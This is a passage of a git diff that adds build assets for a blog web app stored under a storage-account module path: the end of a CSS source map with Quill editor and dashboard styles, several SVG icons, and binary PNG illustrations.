button:hover:not(.ql-active) .ql-fill,\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill {\n fill: #444;\n }\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke,\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter {\n stroke: #444;\n }\n}\n.ql-snow {\n box-sizing: border-box;\n}\n.ql-snow * {\n box-sizing: border-box;\n}\n.ql-snow .ql-hidden {\n display: none;\n}\n.ql-snow .ql-out-bottom,\n.ql-snow .ql-out-top {\n visibility: hidden;\n}\n.ql-snow .ql-tooltip {\n position: absolute;\n transform: translateY(10px);\n}\n.ql-snow .ql-tooltip a {\n cursor: pointer;\n text-decoration: none;\n}\n.ql-snow .ql-tooltip.ql-flip {\n transform: translateY(-10px);\n}\n.ql-snow .ql-formats {\n display: inline-block;\n vertical-align: middle;\n}\n.ql-snow .ql-formats:after {\n clear: both;\n content: '';\n display: table;\n}\n.ql-snow .ql-stroke {\n fill: none;\n stroke: #444;\n stroke-linecap: round;\n stroke-linejoin: round;\n stroke-width: 2;\n}\n.ql-snow .ql-stroke-miter {\n fill: none;\n stroke: #444;\n 
stroke-miterlimit: 10;\n stroke-width: 2;\n}\n.ql-snow .ql-fill,\n.ql-snow .ql-stroke.ql-fill {\n fill: #444;\n}\n.ql-snow .ql-empty {\n fill: none;\n}\n.ql-snow .ql-even {\n fill-rule: evenodd;\n}\n.ql-snow .ql-thin,\n.ql-snow .ql-stroke.ql-thin {\n stroke-width: 1;\n}\n.ql-snow .ql-transparent {\n opacity: 0.4;\n}\n.ql-snow .ql-direction svg:last-child {\n display: none;\n}\n.ql-snow .ql-direction.ql-active svg:last-child {\n display: inline;\n}\n.ql-snow .ql-direction.ql-active svg:first-child {\n display: none;\n}\n.ql-snow .ql-editor h1 {\n font-size: 2em;\n}\n.ql-snow .ql-editor h2 {\n font-size: 1.5em;\n}\n.ql-snow .ql-editor h3 {\n font-size: 1.17em;\n}\n.ql-snow .ql-editor h4 {\n font-size: 1em;\n}\n.ql-snow .ql-editor h5 {\n font-size: 0.83em;\n}\n.ql-snow .ql-editor h6 {\n font-size: 0.67em;\n}\n.ql-snow .ql-editor a {\n text-decoration: underline;\n}\n.ql-snow .ql-editor blockquote {\n border-left: 4px solid #ccc;\n margin-bottom: 5px;\n margin-top: 5px;\n padding-left: 16px;\n}\n.ql-snow .ql-editor code,\n.ql-snow .ql-editor pre {\n background-color: #f0f0f0;\n border-radius: 3px;\n}\n.ql-snow .ql-editor pre {\n white-space: pre-wrap;\n margin-bottom: 5px;\n margin-top: 5px;\n padding: 5px 10px;\n}\n.ql-snow .ql-editor code {\n font-size: 85%;\n padding: 2px 4px;\n}\n.ql-snow .ql-editor pre.ql-syntax {\n background-color: #23241f;\n color: #f8f8f2;\n overflow: visible;\n}\n.ql-snow .ql-editor img {\n max-width: 100%;\n}\n.ql-snow .ql-picker {\n color: #444;\n display: inline-block;\n float: left;\n font-size: 14px;\n font-weight: 500;\n height: 24px;\n position: relative;\n vertical-align: middle;\n}\n.ql-snow .ql-picker-label {\n cursor: pointer;\n display: inline-block;\n height: 100%;\n padding-left: 8px;\n padding-right: 2px;\n position: relative;\n width: 100%;\n}\n.ql-snow .ql-picker-label::before {\n display: inline-block;\n line-height: 22px;\n}\n.ql-snow .ql-picker-options {\n background-color: #fff;\n display: none;\n min-width: 100%;\n padding: 4px 8px;\n position: absolute;\n white-space: nowrap;\n}\n.ql-snow .ql-picker-options .ql-picker-item {\n cursor: pointer;\n display: block;\n padding-bottom: 5px;\n padding-top: 5px;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label {\n color: #ccc;\n z-index: 2;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-fill {\n fill: #ccc;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-stroke {\n stroke: #ccc;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-options {\n display: block;\n margin-top: -1px;\n top: 100%;\n z-index: 1;\n}\n.ql-snow .ql-color-picker,\n.ql-snow .ql-icon-picker {\n width: 28px;\n}\n.ql-snow .ql-color-picker .ql-picker-label,\n.ql-snow .ql-icon-picker .ql-picker-label {\n padding: 2px 4px;\n}\n.ql-snow .ql-color-picker .ql-picker-label svg,\n.ql-snow .ql-icon-picker .ql-picker-label svg {\n right: 4px;\n}\n.ql-snow .ql-icon-picker .ql-picker-options {\n padding: 4px 0px;\n}\n.ql-snow .ql-icon-picker .ql-picker-item {\n height: 24px;\n width: 24px;\n padding: 2px 4px;\n}\n.ql-snow .ql-color-picker .ql-picker-options {\n padding: 3px 5px;\n width: 152px;\n}\n.ql-snow .ql-color-picker .ql-picker-item {\n border: 1px solid transparent;\n float: left;\n height: 16px;\n margin: 2px;\n padding: 0px;\n width: 16px;\n}\n.ql-snow .ql-picker:not(.ql-color-picker):not(.ql-icon-picker) svg {\n position: absolute;\n margin-top: -9px;\n right: 0;\n top: 50%;\n width: 18px;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-font 
.ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-label]:not([data-label=''])::before {\n content: attr(data-label);\n}\n.ql-snow .ql-picker.ql-header {\n width: 98px;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item::before {\n content: 'Normal';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"1\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"1\"]::before {\n content: 'Heading 1';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"2\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"2\"]::before {\n content: 'Heading 2';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"3\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"3\"]::before {\n content: 'Heading 3';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"4\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"4\"]::before {\n content: 'Heading 4';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"5\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"5\"]::before {\n content: 'Heading 5';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"6\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"6\"]::before {\n content: 'Heading 6';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"1\"]::before {\n font-size: 2em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"2\"]::before {\n font-size: 1.5em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"3\"]::before {\n font-size: 1.17em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"4\"]::before {\n font-size: 1em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"5\"]::before {\n font-size: 0.83em;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"6\"]::before {\n font-size: 0.67em;\n}\n.ql-snow .ql-picker.ql-font {\n width: 108px;\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item::before {\n content: 'Sans Serif';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=serif]::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]::before {\n content: 'Serif';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=monospace]::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]::before {\n content: 'Monospace';\n}\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]::before {\n font-family: Georgia, Times New Roman, serif;\n}\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]::before {\n font-family: Monaco, Courier New, monospace;\n}\n.ql-snow .ql-picker.ql-size {\n width: 98px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item::before {\n content: 'Normal';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=small]::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]::before {\n content: 'Small';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=large]::before,\n.ql-snow .ql-picker.ql-size 
.ql-picker-item[data-value=large]::before {\n content: 'Large';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=huge]::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]::before {\n content: 'Huge';\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]::before {\n font-size: 10px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=large]::before {\n font-size: 18px;\n}\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]::before {\n font-size: 32px;\n}\n.ql-snow .ql-color-picker.ql-background .ql-picker-item {\n background-color: #fff;\n}\n.ql-snow .ql-color-picker.ql-color .ql-picker-item {\n background-color: #000;\n}\n.ql-toolbar.ql-snow {\n border: 1px solid #ccc;\n box-sizing: border-box;\n font-family: 'Helvetica Neue', 'Helvetica', 'Arial', sans-serif;\n padding: 8px;\n}\n.ql-toolbar.ql-snow .ql-formats {\n margin-right: 15px;\n}\n.ql-toolbar.ql-snow .ql-picker-label {\n border: 1px solid transparent;\n}\n.ql-toolbar.ql-snow .ql-picker-options {\n border: 1px solid transparent;\n box-shadow: rgba(0,0,0,0.2) 0 2px 8px;\n}\n.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-label {\n border-color: #ccc;\n}\n.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-options {\n border-color: #ccc;\n}\n.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item.ql-selected,\n.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item:hover {\n border-color: #000;\n}\n.ql-toolbar.ql-snow + .ql-container.ql-snow {\n border-top: 0px;\n}\n.ql-snow .ql-tooltip {\n background-color: #fff;\n border: 1px solid #ccc;\n box-shadow: 0px 0px 5px #ddd;\n color: #444;\n padding: 5px 12px;\n white-space: nowrap;\n}\n.ql-snow .ql-tooltip::before {\n content: \"Visit URL:\";\n line-height: 26px;\n margin-right: 8px;\n}\n.ql-snow .ql-tooltip input[type=text] {\n display: none;\n border: 1px solid #ccc;\n font-size: 13px;\n height: 26px;\n margin: 0px;\n padding: 3px 5px;\n width: 170px;\n}\n.ql-snow .ql-tooltip a.ql-preview {\n display: inline-block;\n max-width: 200px;\n overflow-x: hidden;\n text-overflow: ellipsis;\n vertical-align: top;\n}\n.ql-snow .ql-tooltip a.ql-action::after {\n border-right: 1px solid #ccc;\n content: 'Edit';\n margin-left: 16px;\n padding-right: 8px;\n}\n.ql-snow .ql-tooltip a.ql-remove::before {\n content: 'Remove';\n margin-left: 8px;\n}\n.ql-snow .ql-tooltip a {\n line-height: 26px;\n}\n.ql-snow .ql-tooltip.ql-editing a.ql-preview,\n.ql-snow .ql-tooltip.ql-editing a.ql-remove {\n display: none;\n}\n.ql-snow .ql-tooltip.ql-editing input[type=text] {\n display: inline-block;\n}\n.ql-snow .ql-tooltip.ql-editing a.ql-action::after {\n border-right: 0px;\n content: 'Save';\n padding-right: 0px;\n}\n.ql-snow .ql-tooltip[data-mode=link]::before {\n content: \"Enter link:\";\n}\n.ql-snow .ql-tooltip[data-mode=formula]::before {\n content: \"Enter formula:\";\n}\n.ql-snow .ql-tooltip[data-mode=video]::before {\n content: \"Enter video:\";\n}\n.ql-snow a {\n color: #06c;\n}\n.ql-container.ql-snow {\n border: 1px solid #ccc;\n}\n","@import url('https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap');\n\n* {\n\tmargin: 0;\n\tpadding: 0;\n\tbox-sizing: border-box;\n\tfont-family: 'Inter', sans-serif;\n}\n\nbody {\n background-color: white;\n}\n\n/* Blog starts */\n.header {\n\tbackground-color: black;\n\tdisplay: flex;\n\tflex-direction: column;\n\tjustify-content: center;\n\talign-items: center;\n\tpadding: 20px;\n}\n\n.main-title {\n\tcolor: rgb(210, 204, 204);\n\tfont-size: 
2.5em;\n\tletter-spacing: 3px;\n font-weight: 800;\n}\n\n.navbar > ul {\n\tlist-style-type: none;\n\tmargin-top: 30px;\n\t/* border: 1px solid yellow; */\n}\n\n.navbar > ul > li {\n\tdisplay: inline;\n\tmargin: 5px;\n\tpadding: 5px;\n font-weight: 800;\n}\n\n.navbar > ul > li:hover {\n background-color: rgb(56, 58, 58);\n\tborder-radius: 2px;\n}\n\n.body-card {\n display: flex;\n flex-direction: row;\n justify-content: space-evenly;\n flex-wrap: wrap;\n margin-top: 10px;\n}\n\n.body-card a, .navbar a {\n text-decoration: none;\n\tcolor: rgb(174, 170, 170);\n\tletter-spacing: 3px;\n font-weight: 900;\n\tfont-size: .75em;\n\tpadding: 7px;\n}\n\n/* .body-card img {\n\twidth: 400px;\n\tmargin-top: 30px;\n\tmargin-bottom: 15px;\n} */\n\n.body-card .card-title {\n\twidth: 400px;\n\tletter-spacing: 2px;\n\tfont-size: 0.9em;\n font-weight: 700;\n}\n\n.card > ul {\n\tlist-style-type: none;\n\tdisplay: inline;\n}\n\n.post-type-link {\n\tmargin-bottom: 10px;\n}\n\n.post-type-link > a {\n\tcolor: rgb(170, 167, 167);\n\tpadding: 0;\n\tletter-spacing: 2px;\n}\n\n.post-type-link > a:hover {\n\tcolor: rgb(3, 3, 3);\n}\n\n.card-details > ul{\n\tdisplay: inline-block;\n\tmargin: 0;\n\tpadding: 0;\n\tlist-style-type: none;\n\tmargin-top: 10px;\n}\n\n.card-details > ul > li{\n\tdisplay: inline-block;\n\tcolor: rgb(42, 42, 49);\n\tfont-size: .8em;\n\tfont-weight: 900;\n}\n\n.card-details > ul > li > a {\n\tfont-size: 1em;\n\tletter-spacing: 0.1em;\n}\n\n.card-details > ul > li > a:hover {\n\tcolor: black;\n}\n\n.card-content {\n\twidth: 400px;\n overflow: hidden;\n\tdisplay: -webkit-box;\n\t-webkit-line-clamp: 3;\n\t-webkit-box-orient: vertical;\n\tmargin-top: 15px;\n\tletter-spacing: 0.4px;\n font-weight: 400;\n\tmargin-bottom: 20px;\n}\n\n.load-more-button {\n\tdisplay: flex;\n\tflex-direction: row;\n\tjustify-content: center;\n\tmargin-bottom: 50px;\n}\n\n.load-more-button > button {\n\tbackground-color: black;\n\tcolor: white;\n\tpadding: 10px;\n\twidth: 200px;\n\tcursor: pointer;\n\tletter-spacing: 0.2em;\n}\n\n.footer {\n\tposition: absolute;\n\tbackground-color: black;\n\twidth: 100%;\n\tcolor: white;\n\tfont-family: Inter;\n\tpadding: 30px;\n\tcolor: rgb(210, 204, 204);\n\tfont-size: 2.5em;\n\tletter-spacing: 3px;\n\tdisplay: flex;\n\tflex-direction: row;\n\tjustify-content: center;\n\talign-items: center;\n}\n\n.input-name {\n margin: 0;\n\tbackground-color: white;\n\theight: 40px;\n\tcolor: black;\n\tfont-family: Inter;\n\tpadding: 5px;\n\tborder-radius: 7px;\n\twidth: 500px;\n margin-right: 60px;\n margin-top: 4px;\n}\n\n.search-btn, .admin-save-btn {\n\tbackground-color: white;\n\tpadding: 3px;\n\twidth: 100px;\n\tcursor: pointer;\n font-weight: 700;\n line-height: 3px;\n\tfont-family: Inter;\n\theight: 35px;\n}\n\n.admin-content {\n\tdisplay: flex;\n\tborder: 2px solid orangered;\n\t/* justify-content: space-between; */\n}\n\n.admin-title {\n\twidth: 50rem;\n\theight: 3rem;\n\tborder: 0.2px solid grey;\n\tborder-radius: 10px;\n\tletter-spacing: .9px;\n\tpadding: 20px;\n\tfont-size: 1.1rem;\n\tbackground-color: rgb(245, 247, 247);\n}\n\n.admin-save-btn {\n\tborder: 0;\n\theight: 3rem;\n\tborder-radius: 10px;\n\tletter-spacing: 1.3px;\n\tfont-size: 0.9rem;\n\tbackground-color: rgb(235, 169, 37);\n}\n\n.admin-save-btn:active {\n\ttransform: translateY(3px);\n}\n\n.admin-editor {\n\tdisplay: flex;\n\tborder: 1px solid greenyellow;\n}\n\n.admin-editor-content {\n\tborder: 5px solid brown;\n}\n\n/* Sidebar starts */\n.sidebar {\n display: flex;\n}\n\n.sidebar .logo {\n width: 110px;\n margin-left: 
20px;\n margin-top: 1px;\n\n}\n\n.sidebar .nav-menu {\n display: flex;\n background-color: rgb(25, 24, 59);\n width: 220px;\n height: 100vh;\n justify-content: center;\n position: fixed;\n}\n\n.nav-text {\n display: flex;\n justify-content: flex-start;\n align-items: center;\n padding: 8px 0px 8px 16px;\n list-style: none;\n height: 60px;\n}\n\n.nav-text a {\n text-decoration:none;\n color:#f5f5f5;\n font-size:18px;\n width:95%;\n height:100%;\n display:flex;\n align-items:center;\n padding:16px;\n border-radius:4px;\n letter-spacing: 0.5px;\n}\n\n.nav-text:hover {\n background-color: rgb(49, 57, 100);\n}\n\n.nav-menu-items {\n margin-top: 20px;\n width: 100%;\n}\n\n.sidebar span {\n margin-left: 16px;\n}\n\n/* Prosemirror Tiptap */\n/* Basic editor styles */\n\n.ProseMirror > * + * {\n margin-top: 0.75em;\n}\n.ProseMirror ul, .ProseMirror ol {\n padding: 0 1rem;\n}\n.ProseMirror h1, .ProseMirror h2, .ProseMirror h3, .ProseMirror h4, .ProseMirror h5, .ProseMirror h6 {\n line-height: 1.1;\n}\n.ProseMirror code {\n background-color: rgba(97, 97, 97, 0.1);\n color: #616161;\n}\n.ProseMirror pre {\n background: #a3a0a0;\n color: #fff;\n font-family: 'JetBrainsMono', monospace;\n padding: 0.75rem 1rem;\n border-radius: 0.5rem;\n}\n.ProseMirror pre code {\n color: black;\n padding: 0;\n background: none;\n font-size: 0.8rem;\n}\n.ProseMirror img {\n max-width: 100%;\n height: auto;\n}\n.ProseMirror blockquote {\n padding-left: 1rem;\n border-left: 2px solid rgba(13, 13, 13, 0.1);\n}\n.ProseMirror hr {\n border: none;\n border-top: 2px solid rgba(13, 13, 13, 0.1);\n margin: 2rem 0;\n}\n\n\n/* Pages start */\n.dashboard,\n.profile,\n.posts,\n.author,\n.settings {\n margin-top: 40px;\n margin-left: 270px;\n margin-right: 50px;\n padding: 10px;\n display: flex;\n /* border: 1px solid orange; */\n}\n\n.settings {\n display: block;\n}\n\n.posts-div {\n display: flex;\n flex: 2.35 1 25%;\n /* border: 1px solid orangered; */\n}\n\n.posts-btn-div {\n display: flex;\n justify-content: flex-end;\n /* border: 1px solid black; */\n flex-grow: 1;\n}\n\n.newpost-editor {\n flex: 3 1 33.33%;\n /* margin-top: 40px; */\n /* margin-left: 270px; */\n /* margin-right: 50px; */\n /* width: 73%; */\n height: 500px;\n /* margin-bottom: 100px; */\n border: 1px solid rgb(222, 217, 217);\n overflow: scroll;\n padding: 40px;\n border-radius: 10px;\n}\n\n.newpost-editor-leftdetails {\n flex-grow: 1;\n display: flex;\n flex-direction: column;\n gap: 3em;\n justify-content: space-between;\n align-items: flex-end;\n}\n\n.newpost-editor-leftdetails-author-select span {\n font-weight: 500;\n font-size: 14px;\n}\n\n.post-image-upload {\n display: flex;\n flex-direction: column;\n justify-content: flex-end;\n align-items: flex-end;\n}\n\n.post-image-upload img {\n width: 200px;\n border: 0.4px solid rgb(217, 211, 199);\n border-radius: 10px;\n}\n\n.posts-title,\n.posts-btn {\n border: 0.1px solid grey;\n border-radius: 10px;\n padding: 10px;\n font-size: 1em;\n}\n\n.posts-title {\n flex-grow: 1;\n background-color: rgb(239, 242, 245);\n}\n\n.posts-btn {\n background-color: rgb(56, 77, 162);\n color: white;\n width: 100px;\n}\n\n.posts-btn:hover {\n background-color: rgb(40, 111, 187);\n cursor: pointer;\n}\n\n.posts-btn:active {\n transform: translateY(3px);\n}\n\n.image-input-class {\n /* border: 1px solid orange; */\n width: 200px;\n margin-top: 10px;\n background-color: #ecca74;\n font-weight: 600;\n}\n\n.editor {\n /* border: 1px solid black; */\n height: 250px;\n /* word-wrap: break-word; */\n}\n\n.author {\n display: flex;\n 
justify-content: center;\n align-items: center;\n /* border: 1px solid black; */\n}\n\nh2 {\n font-size: 2rem;\n}\n\n.author-content {\n display: flex;\n justify-content: space-between;\n align-items: center;\n}\n\n.author-btn-div {\n display: flex;\n justify-content: center;\n align-items: center;\n margin-left: 230px;\n}\n\n.data-grid {\n display: flex;\n justify-content: center;\n align-items: center;\n height: 59vh;\n}\n\n.login-main-container {\n border: 0.5px solid rgb(205, 195, 195);\n width: 80%;\n height: 80vh;\n display: flex;\n justify-content: flex-start;\n margin: auto;\n margin-top: 10vh;\n border-radius: 10px;\n box-shadow: 4px 4px 4px 4px rgb(230, 236, 236);\n}\n\n.login-image {\n width: 50%;\n height: 100%;\n border-top-left-radius: 10px;\n border-bottom-left-radius: 10px;\n margin-top: 0vh;\n}\n\n.login-secondary-container {\n /* border: 1px solid orange; */\n width: 80%;\n height: 80%;\n margin: auto;\n margin-left: 100px;\n margin-right: 100px;\n}\n\n.login-secondary-container-signup {\n height: 98%;\n}\n\n.h3-login-container {\n /* border: 1px solid black; */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n display: flex;\n flex-direction: column;\n justify-content: flex-end;\n align-items: flex-start;\n}\n\n.h3-login-container-signup {\n justify-content: flex-start;\n height: 2vh;\n width: 100%;\n margin-left: -1.5px;\n align-items: center;\n}\n\n.h3-login-container-reset {\n justify-content: center;\n height: 10vh;\n}\n\n.h3-login {\n font-weight: 100;\n letter-spacing: 1px;\n}\n\n.login-form-container {\n margin-top: 30px;\n /* border: 1px solid rgb(152, 5, 5); */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n}\n\n.login-form-container-signup {\n margin-top: 5px;\n}\n\n.login-form-container-reset {\n margin-top: 0;\n height: 30vh;\n}\n\n.login-span {\n margin-left: 0%;\n font-size: 14px;\n}\n\n.login-span-signup {\n font-size: 12px;\n}\n\n.login-input {\n border: 0.3px solid grey;\n border-radius: 7px;\n width: 95%;\n margin-top: 10px;\n height: 40px;\n padding: 10px;\n}\n\n.login-input-signup {\n margin-top: 4px;\n padding: 5px;\n}\n\n.login-button-container-main {\n margin-top: 15px;\n /* border: 1px solid rgb(152, 5, 5); */\n height: 20vh;\n width: 95%;\n margin-left: 2.5%;\n margin-right: 2.5%;\n}\n\n.login-button-container-main-reset {\n margin-top: 60px;\n}\n\n.login-button-container {\n width: 95%;\n padding: 15px;\n border-radius: 7px;\n background-color: #3554d2;\n color: white;\n font-size: 15px;\n border: 0px;\n cursor: pointer;\n}\n\n.login-button-container:active {\n transform: translateY(3px);\n}\n\n.login-signup-button {\n color: rgb(31, 31, 92);\n letter-spacing: 0px;\n}\n\n.login-reset-password {\n color: rgb(31, 31, 92);\n letter-spacing: 0px;\n float: right;\n margin-right: 10px;\n margin-top: -2px;\n}\n\n.signup-select {\n padding: 10px;\n border-radius: 7px;\n margin: 10px;\n margin-left: -2px;\n margin-bottom: 2px;\n}\n\n.settings-title {\n font-size: 1.5rem;\n letter-spacing: 0.9px;\n}\n\n.settings-div {\n border: 0.7px solid rgb(232, 226, 226);\n margin-top: 30px;\n border-radius: 10px;\n padding: 30px;\n box-shadow: 2px 2px 2px 2px rgb(230, 236, 236);\n}\n\n.settings-menu-title {\n font-size: 1.1rem;\n margin-bottom: 10px;\n}\n\n.change-password-form {\n padding: 20px;\n}\n\n.settings-menu-sub-heading-span {\n display: inline-block;\n font-weight: 500;\n letter-spacing: 0.3px;\n font-size: 16px;\n margin-bottom: 5px;\n margin-left: 17px;\n}\n\n.settings-menu-sub-heading-input {\n height: 
35px;\n margin-left: 17px;\n margin-bottom: 15px;\n width: 300px;\n padding: 10px;\n letter-spacing: 1px;\n border-radius: 10px;\n border: 1px solid rgb(191, 187, 187);\n background-color: rgb(250, 250, 249);\n}\n\n.author-name {\n margin: 0;\n}\n\n.settings-menu-sub-heading-submit {\n margin-left: 18px;\n height: 40px;\n width: 300px;\n padding: 10px;\n letter-spacing: 1px;\n border-radius: 10px;\n border: 0;\n background-color: #2C974B;\n font-size: 16px;\n color: white;\n cursor: pointer;\n}\n\n.profile {\n display: block;\n border: 1px solid black;\n}\n\n.editorcontent {\n margin-top: 10px;\n /* border: 1px solid black; */\n line-height: 1.7em;\n padding: 30px;\n}\n.emailUserListClass {\n -webkit-user-select: none;\n -moz-user-select: none;\n -ms-user-select: none;\n user-select: none;\n}"],"names":[],"sourceRoot":""} \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg new file mode 100644 index 0000000..c361707 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_de.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg new file mode 100644 index 0000000..485ad5c --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_en.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg new file mode 100644 index 0000000..2ae63a1 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_flag_fr.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg new file mode 100644 index 0000000..0fa6d65 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_chat.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg new file mode 100644 index 0000000..524fc75 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_mail.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg new file mode 100644 index 0000000..87f3b79 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_package.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg new file mode 100644 index 0000000..da3d5ad --- /dev/null +++ 
b/modules/module-1/resources/storage_account/webfiles/build/static/icons/ic_notification_shipping.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg b/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg new file mode 100644 index 0000000..38aac7e --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/icons/shape-avatar.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg new file mode 100644 index 0000000..d0df341 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_404.svg @@ -0,0 +1,40 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png new file mode 100644 index 0000000..91404c8 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_avatar.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png new file mode 100644 index 0000000..74f8171 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_login.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png new file mode 100644 index 0000000..606b7d0 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/illustration_register.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png new file mode 100644 index 0000000..a85bbac Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/static/illustrations/register.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/js/787.8c65ad62.chunk.js 